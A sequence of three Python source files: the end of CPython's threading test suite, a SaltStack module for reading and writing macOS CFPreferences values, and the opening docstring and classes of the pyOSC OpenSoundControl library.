print("thread_dict.atexit = %r" % thread_dict.atexit)
thread_dict = threading.local()
thread_dict.atexit = "value"
atexit = Atexit()
""")
self.assertEqual(out.rstrip(), b"thread_dict.atexit = 'value'")
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
from test import support
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
from test import support
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
with open(os.__file__, 'rb') as in_f:
stuff = in_f.read(200)
with open(os.devnull, 'wb') as null_f:
null_f.write(stuff)
time.sleep(random.random() / 1995)
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
support.wait_process(pid, exitcode=50)
else:
os._exit(50)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(51)
else:
os._exit(52)
else:
support.wait_process(pid, exitcode=51)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def pipe(self):
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
if hasattr(os, 'set_blocking'):
os.set_blocking(r, False)
return (r, w)
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = f"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep({test.support.SHORT_TIMEOUT})
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
        self.assertRaises(RuntimeError, current_thread.join)
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class ThreadRunFail(threading.Thread):
def run(self):
raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
def test_excepthook(self):
with support.captured_output("stderr") as stderr:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("run failed")', stderr)
self.assertIn('ValueError: run failed', stderr)
@support.cpython_only
def test_excepthook_thread_None(self):
# threading.excepthook called with thread=None: log the thread
# identifier in this case.
with support.captured_output("stderr") as stderr:
try:
raise ValueError("bug")
except Exception as exc:
args = threading.ExceptHookArgs([*sys.exc_info(), None])
try:
threading.excepthook(args)
finally:
# Explicitly break a reference cycle
args = None
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("bug")', stderr)
self.assertIn('ValueError: bug', stderr)
def test_system_exit(self):
class ThreadExit(threading.Thread):
def run(self):
sys.exit(1)
# threading.excepthook() silently ignores SystemExit
with support.captured_output("stderr") as stderr:
thread = ThreadExit()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
def test_custom_excepthook(self):
args = None
def hook(hook_args):
nonlocal args
args = hook_args
try:
with support.swap_attr(threading, 'excepthook', hook):
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(args.exc_type, ValueError)
self.assertEqual(str(args.exc_value), 'run failed')
self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
self.assertIs(args.thread, thread)
finally:
# Break reference cycle
args = None
def test_custom_excepthook_fail(self):
def threading_hook(args):
raise ValueError("threading_hook failed")
err_str = None
def sys_hook(exc_type, exc_value, exc_traceback):
nonlocal err_str
err_str = str(exc_value)
with support.swap_attr(threading, 'excepthook', threading_hook), \
support.swap_attr(sys, 'excepthook', sys_hook), \
support.captured_output('stderr') as stderr:
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(),
'Exception in threading.excepthook:\n')
self.assertEqual(err_str, 'threading_hook failed')
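# A minimal sketch (illustrative, not part of the test suite) of installing a
# custom threading.excepthook, the API exercised by ExceptHookTests above; the
# hook receives an args object with exc_type, exc_value, exc_traceback and
# thread attributes, as the tests verify:
#
#     def hook(args):
#         print("uncaught in %s: %r" % (args.thread.name, args.exc_value))
#     threading.excepthook = hook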
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in main thread that
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
class AtexitTests(unittest.TestCase):
def test_atexit_output(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
def run_last():
print('parrot')
threading._register_atexit(run_last)
""")
self.assertFalse(err)
self.assertEqual(out.strip(), b'parrot')
def test_atexit_called_once(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
from unittest.mock import Mock
mock = Mock()
threading._register_atexit(mock)
mock.assert_not_called()
# force early shutdown to ensure it was called once
threading._shutdown()
mock.assert_called_once()
""")
self.assertFalse(err)
def test_atexit_after_shutdown(self):
# The only way to do this is by registering an atexit within
# an atexit, which is intended to raise an exception.
rc, out, err = assert_python_ok("-c", """if True:
import threading
def func():
pass
def run_last():
threading._register_atexit(func)
threading._register_atexit(run_last)
""")
self.assertTrue(err)
self.assertIn("RuntimeError: can't register atexit after shutdown",
err.decode())
if __name__ == "__main__":
unittest.main()
|
mac_prefs.py
|
# -*- coding: utf-8 -*-
'''
Support for reading and writing preference key/values with ObjectiveC's
CFPreferences API. Documentation on these utilities can be found here:
https://developer.apple.com/documentation/corefoundation/preferences_utilities?language=objc
This appears to be significantly faster than shelling out to `defaults`.
This module has some caveats.
1. Requires the PyObjC package. It will try to import this package from Salt's
path; if that fails it will try to use the system PyObjC that ships with macOS.
'''
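# A minimal sketch (not part of the original module) of what these functions
# translate to at the CFPreferences layer, assuming PyObjC's Foundation bridge
# is importable (the calls below are the same ones this module uses):
#
#     import Foundation
#     # read a key for the current user / any host:
#     Foundation.CFPreferencesCopyValue(
#         'IdleTime', 'com.apple.ScreenSaver',
#         Foundation.kCFPreferencesCurrentUser,
#         Foundation.kCFPreferencesAnyHost)
#     # write and flush a key at the 'app value' level:
#     Foundation.CFPreferencesSetAppValue('IdleTime', 180, 'com.apple.ScreenSaver')
#     Foundation.CFPreferencesAppSynchronize('com.apple.ScreenSaver')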
# py libs
import logging
import sys
import os
import pwd
import multiprocessing
# salt libs
import salt.utils
import salt.utils.platform
from salt.exceptions import CommandExecutionError
log = logging.getLogger(__name__)
try:
import Foundation
from PyObjCTools import Conversion
log.trace('module.mac_prefs - PyObjC import successful.')
except ImportError:
log.trace('module.mac_prefs - Failed to Import PyObjC, Using Sys.')
sys.path.append('/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC')
import Foundation
from PyObjCTools import Conversion
__virtualname__ = 'prefs'
__func_alias__ = {
'set_': 'set',
'list_': 'list',
}
def __virtual__():
if salt.utils.platform.is_darwin():
return __virtualname__
return (False, 'module.mac_prefs only available on macOS.')
def _convert_pyobjc_objects(pref):
'''
    Types get returned as ObjectiveC classes from PyObjC, and salt has a hard
    time writing those out, so this function converts NSDictionary and NSArray
    objects to normal Python dictionary and list objects.
'''
if isinstance(pref, Foundation.NSDate):
log.debug('mac_prefs._convert_pyobjc_objects - '
'converting "{}" NSDate to string...'.format(pref))
return str(pref)
return Conversion.pythonCollectionFromPropertyList(pref)
def _get_user_and_host(user, host):
'''
returns a tuple of kCFPreferences(Any/Current)User and
kCFPreferences(Any/Current)Host.
'''
if user.lower() == 'any':
user_pref = Foundation.kCFPreferencesAnyUser
elif user.lower() == 'current':
user_pref = Foundation.kCFPreferencesCurrentUser
else:
        raise CommandExecutionError(
            'Error processing parameter "user": must be "any" or'
            ' "current", not [{0}]'.format(user)
        )
if host.lower() == 'any':
host_pref = Foundation.kCFPreferencesAnyHost
elif host.lower() == 'current':
host_pref = Foundation.kCFPreferencesCurrentHost
else:
        raise CommandExecutionError(
            'Error processing parameter "host": must be "any" or'
            ' "current", not [{0}]'.format(host)
        )
log.debug('Using user domain: [{}] and host domain: [{}]'.format(user_pref,
host_pref))
return (user_pref, host_pref)
def _read_pref(name, domain, user, host, runas, runas_data):
'''
helper function for reading the preference, either at the user level
or system level
'''
if runas:
try:
# convert to uid for later use.
uid = pwd.getpwnam(runas).pw_uid
except KeyError:
            raise CommandExecutionError(
                'The runas user [{}] does not exist.'.format(runas)
            )
# need to run as the user
        log.debug('Setting UID to {}'.format(runas))
os.setuid(uid)
if user:
user_domain, host_domain = _get_user_and_host(user, host)
log.debug('Reading key: "{}" in domain: "{}"'.format(name, domain))
value = Foundation.CFPreferencesCopyValue(name,
domain,
user_domain,
host_domain)
if runas:
runas_data.put(value)
            return
        return value
    # no user/host domains given: read root's copy at the 'app value' level
path = '/var/root/Library/Preferences/'
d_path = os.path.join(path, domain)
log.debug('Reading key: "{}" in domain: "{}" at "{}"'.format(name, domain, d_path))
return Foundation.CFPreferencesCopyAppValue(name, domain)
def _set_pref(name, value, domain, user, host, runas, runas_data):
'''
sets the pref for the user not at the app value level
returns true or false if the preference was set correctly or not.
'''
if runas:
try:
# convert to uid for later use.
uid = pwd.getpwnam(runas).pw_uid
except KeyError:
            raise CommandExecutionError(
                'The runas user [{}] does not exist.'.format(runas)
            )
# need to run as the user
log.debug('Setting UID to {}'.format(runas))
os.setuid(uid)
if user:
pref_user, pref_host = _get_user_and_host(user, host)
path = '/Library/Preferences/'
d_path = os.path.join(path, domain)
        log.debug('Setting key: "{}" to value: "{}" in '
                  'domain: "{}" in "{}"'.format(name, value, domain, d_path))
try:
set_val = Foundation.CFPreferencesSetValue(name,
value,
domain,
pref_user,
pref_host)
Foundation.CFPreferencesAppSynchronize(domain)
return set_val
except BaseException:
log.warning('prefs._set_pref caught exception on user set.')
return False
path = '/var/root/Library/Preferences/'
d_path = os.path.join(path, domain)
    log.debug('Setting key: "{}" to value: "{}" in'
              ' domain: "{}" in "{}"'.format(name, value, domain, d_path))
Foundation.CFPreferencesSetAppValue(name, value, domain)
return Foundation.CFPreferencesAppSynchronize(domain)
def read(name, domain, user=None, host=None, runas=None, runas_data=None):
'''
Read a preference using CFPreferences.
name
The preference key to read.
domain
        The domain in which the key should be read.
user
The user domain to use, either 'current' or 'any'
host
The host domain to use, either 'current' or 'any'
runas
        The user to run as; should be a short username.
:return: The value of the key, or None if it doesn't exist.
CLI Example:
.. code-block:: bash
salt '*' prefs.read IdleTime com.apple.ScreenSaver
        salt '*' prefs.read IdleTime com.apple.ScreenSaver user=current host=any
'''
    if runas and (not user or not host):
        raise CommandExecutionError(
            'If using "runas" you must specify both "user" and "host" domains.'
        )
    if (user and not host) or (host and not user):
        raise CommandExecutionError(
            'If using "host" or "user" you must specify both, not just one.'
        )
return _convert_pyobjc_objects(_read_pref(name,
domain,
user,
host,
runas,
runas_data))
def set_(name, value, domain, user=None, host=None, runas=None, runas_data=None):
'''
Set a preference value using CFPreferences.
name
The preference key to set.
value
The value to which the key should be set. If you want to delete or
remove the key set this parameter to None.
domain
        The domain in which the key and value should be set.
user
The user domain to use, either 'current' or 'any'
host
The host domain to use, either 'current' or 'any'
runas
        The user to run as; should be a short username.
:return: A Boolean on whether or not the preference was set correctly.
:rtype: bool
CLI Example:
.. code-block:: bash
salt '*' prefs.set IdleTime 180 com.apple.ScreenSaver
        salt '*' prefs.set IdleTime 180 com.apple.ScreenSaver user=current host=any
'''
    if runas and (not user or not host):
        raise CommandExecutionError(
            'If using "runas" you must specify both "user" and "host" domains.'
        )
    if (user and not host) or (host and not user):
        raise CommandExecutionError(
            'If using "host" or "user" you must specify both, not just one.'
        )
    if runas:
        multiprocessing.set_start_method('spawn')
        proc = multiprocessing.Process(target=_set_pref, args=(name, value, domain, user, host, runas, runas_data))
        proc.start()
        proc.join()
    else:
        _set_pref(name, value, domain, user, host, runas, runas_data)
    # get the value to check if it was set correctly.
    if runas:
        runas_data = multiprocessing.Queue()
        proc = multiprocessing.Process(target=read, args=(name, domain, user, host, runas, runas_data))
        proc.start()
        new_val = runas_data.get()
        proc.join()
    else:
        new_val = read(name, domain, user, host, runas, runas_data)
log.debug('New value for key: "{}" in domain: '
'"{}" is "{}"'.format(name, domain, new_val))
# check to see if everything was set correctly
if new_val != value:
log.debug('prefs.set Value of {}, for key {}, '
'was not set properly.'.format(value, name))
return False
return True
def list_(name, user, host, runas=None, values=False):
'''
List all Keys in the given domain.
name
The preference domain to get keys from.
user
The user domain to use, either 'current' or 'any'
host
The host domain to use, either 'current' or 'any'
runas
        The user to run as; should be a short username.
values
        Pass True to return a dictionary of the key/value pairs.
:rtype: list,dict
CLI Example:
.. code-block:: bash
salt '*' prefs.list com.apple.RemoteManagement any any values=True
salt '*' prefs.list com.apple.ScreenSaver current current runas=deadb33f
'''
log.debug('Gathering Key List for {}'.format(name))
    if runas and (not user or not host):
        raise CommandExecutionError(
            'If using "runas" you must specify both "user" and "host" domains.'
        )
    if (user and not host) or (host and not user):
        raise CommandExecutionError(
            'If using "host" or "user" you must specify both, not just one.'
        )
user_domain, host_domain = _get_user_and_host(user, host)
if runas:
try:
# convert to uid for later use.
uid = pwd.getpwnam(runas).pw_uid
except KeyError:
            raise CommandExecutionError(
                'The runas user [{}] does not exist.'.format(runas)
            )
# need to run as the user
log.debug('Setting EUID to [{}]'.format(runas))
os.seteuid(uid)
key_list = Foundation.CFPreferencesCopyKeyList(name, user_domain, host_domain)
os.seteuid(0)
con_key_list = _convert_pyobjc_objects(key_list) or []
log.debug('Key list: "{}"'.format(con_key_list))
if not values:
return con_key_list
value_dict = dict()
try:
for item in con_key_list:
value_dict[item] = read(item, name, user, host, runas)
    except TypeError:
        return None
log.debug('Values List: "{}"'.format(value_dict))
return value_dict
|
OSC.py
|
#!/usr/bin/python
"""
This module contains an OpenSoundControl implementation (in Pure Python), based
(somewhat) on the good old 'SimpleOSC' implementation by Daniel Holth & Clinton
McChesney.
This implementation is intended to still be 'simple' to the user, but much more
complete (with OSCServer & OSCClient classes) and much more powerful (the
OSCMultiClient supports subscriptions & message-filtering, OSCMessage &
OSCBundle are now proper container-types)
===============================================================================
OpenSoundControl
===============================================================================
OpenSoundControl is a network-protocol for sending (small) packets of addressed
data over network sockets. This OSC-implementation supports the classical
UDP/IP protocol for sending and receiving packets but provides as well support
for TCP/IP streaming, whereas the message size is prepended as int32 (big
endian) before each message/packet.
OSC-packets come in two kinds:
- OSC-messages consist of an 'address'-string (not to be confused with a
(host:port) network-address!), followed by a string of 'typetags'
associated with the message's arguments (ie. 'payload'), and finally the
arguments themselves, encoded in an OSC-specific way. The OSCMessage class
makes it easy to create & manipulate OSC-messages of this kind in a
'pythonesque' way (that is, OSCMessage-objects behave a lot like lists)
- OSC-bundles are a special type of OSC-message containing only
OSC-messages as 'payload'. Recursively. (meaning; an OSC-bundle could
contain other OSC-bundles, containing OSC-bundles etc.)
OSC-bundles start with the special keyword '#bundle' and do not have an
OSC-address (but the OSC-messages a bundle contains will have OSC-addresses!).
Also, an OSC-bundle can have a timetag, essentially telling the receiving
server to 'hold' the bundle until the specified time. The OSCBundle class
allows easy creation & manipulation of OSC-bundles.
For further information see also http://opensoundcontrol.org/spec-1_0
-------------------------------------------------------------------------------
To send OSC-messages, you need an OSCClient, and to receive OSC-messages you
need an OSCServer.
The OSCClient uses an 'AF_INET / SOCK_DGRAM' type socket (see the 'socket'
module) to send binary representations of OSC-messages to a remote host:port
address.
The OSCServer listens on an 'AF_INET / SOCK_DGRAM' type socket bound to a local
port, and handles incoming requests. Either one-after-the-other (OSCServer) or
in a multi-threaded / multi-process fashion (ThreadingOSCServer/
ForkingOSCServer). If the Server has a callback-function (a.k.a. handler)
registered to 'deal with' (i.e. handle) the received message's OSC-address,
that function is called, passing it the (decoded) message.
The different OSCServers implemented here all support the (recursive) un-
bundling of OSC-bundles, and OSC-bundle timetags.
In fact, this implementation supports:
- OSC-messages with 'i' (int32), 'f' (float32), 'd' (double), 's' (string) and
'b' (blob / binary data) types
- OSC-bundles, including timetag-support
- OSC-address patterns including '*', '?', '{,}' and '[]' wildcards.
(please *do* read the OSC-spec! http://opensoundcontrol.org/spec-1_0 it
explains what these things mean.)
In addition, the OSCMultiClient supports:
- Sending a specific OSC-message to multiple remote servers
- Remote server subscription / unsubscription (through OSC-messages, of course)
- Message-address filtering.
-------------------------------------------------------------------------------
SimpleOSC:
Copyright (c) Daniel Holth & Clinton McChesney.
pyOSC:
Copyright (c) 2008-2010, Artem Baguinski <artm@v2.nl> et al., Stock, V2_Lab, Rotterdam, Netherlands.
Streaming support (OSC over TCP):
Copyright (c) 2010 Uli Franke <uli.franke@weiss.ch>, Weiss Engineering, Uster, Switzerland.
-------------------------------------------------------------------------------
Changelog:
-------------------------------------------------------------------------------
v0.3.0 - 27 Dec. 2007
Started out to extend the 'SimpleOSC' implementation (v0.2.3) by Daniel Holth & Clinton McChesney.
Rewrote OSCMessage
Added OSCBundle
v0.3.1 - 3 Jan. 2008
Added OSClient
Added OSCRequestHandler, loosely based on the original CallbackManager
Added OSCServer
Removed original CallbackManager
Adapted testing-script (the 'if __name__ == "__main__":' block at the end) to use new Server & Client
v0.3.2 - 5 Jan. 2008
Added 'container-type emulation' methods (getitem(), setitem(), __iter__() & friends) to OSCMessage
Added ThreadingOSCServer & ForkingOSCServer
- 6 Jan. 2008
Added OSCMultiClient
Added command-line options to testing-script (try 'python OSC.py --help')
v0.3.3 - 9 Jan. 2008
Added OSC-timetag support to OSCBundle & OSCRequestHandler
Added ThreadingOSCRequestHandler
v0.3.4 - 13 Jan. 2008
Added message-filtering to OSCMultiClient
Added subscription-handler to OSCServer
Added support for numpy/scipy int & float types. (these get converted to 'standard' 32-bit OSC ints / floats!)
Cleaned-up and added more Docstrings
v0.3.5 - 14 aug. 2008
Added OSCServer.reportErr(...) method
v0.3.6 - 19 April 2010
Added Streaming support (OSC over TCP)
Updated documentation
Moved pattern matching stuff into separate class (OSCAddressSpace) to
facilitate implementation of different server and client architectures.
Callbacks feature now a context (object oriented) but dynamic function
inspection keeps the code backward compatible
Moved testing code into separate testbench (testbench.py)
-----------------
Original Comments
-----------------
> Open SoundControl for Python
> Copyright (C) 2002 Daniel Holth, Clinton McChesney
>
> This library is free software; you can redistribute it and/or modify it under
> the terms of the GNU Lesser General Public License as published by the Free
> Software Foundation; either version 2.1 of the License, or (at your option) any
> later version.
>
> This library is distributed in the hope that it will be useful, but WITHOUT ANY
> WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
> PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
> details.
>
> You should have received a copy of the GNU Lesser General Public License along
> with this library; if not, write to the Free Software Foundation, Inc., 59
> Temple Place, Suite 330, Boston, MA 02111-1307 USA
>
> For questions regarding this module contact Daniel Holth <dholth@stetson.edu>
> or visit http://www.stetson.edu/~ProctoLogic/
>
> Changelog:
> 15 Nov. 2001:
> Removed dependency on Python 2.0 features.
> - dwh
> 13 Feb. 2002:
> Added a generic callback handler.
> - dwh
"""
import math, re, socket, select, string, struct, sys, threading, time, types, array, errno, inspect
from SocketServer import UDPServer, DatagramRequestHandler, ForkingMixIn, ThreadingMixIn, StreamRequestHandler, TCPServer
from contextlib import closing
global version
version = ("0.3","6", "$Rev: 6382 $"[6:-2])
global FloatTypes
FloatTypes = [types.FloatType]
global IntTypes
IntTypes = [types.IntType]
global NTP_epoch
from calendar import timegm
NTP_epoch = timegm((1900,1,1,0,0,0)) # NTP time started in 1 Jan 1900
del timegm
global NTP_units_per_second
NTP_units_per_second = 0x100000000 # about 232 picoseconds
##
# numpy/scipy support:
##
try:
from numpy import typeDict
for ftype in ['float32', 'float64', 'float128']:
try:
FloatTypes.append(typeDict[ftype])
except KeyError:
pass
for itype in ['int8', 'int16', 'int32', 'int64']:
try:
IntTypes.append(typeDict[itype])
IntTypes.append(typeDict['u' + itype])
except KeyError:
pass
# thanks for those...
del typeDict, ftype, itype
except ImportError:
pass
######
#
# OSCMessage classes
#
######
class OSCMessage(object):
""" Builds typetagged OSC messages.
OSCMessage objects are container objects for building OSC-messages.
On the 'front' end, they behave much like list-objects, and on the 'back' end
they generate a binary representation of the message, which can be sent over a network socket.
OSC-messages consist of an 'address'-string (not to be confused with a (host, port) IP-address!),
followed by a string of 'typetags' associated with the message's arguments (ie. 'payload'),
and finally the arguments themselves, encoded in an OSC-specific way.
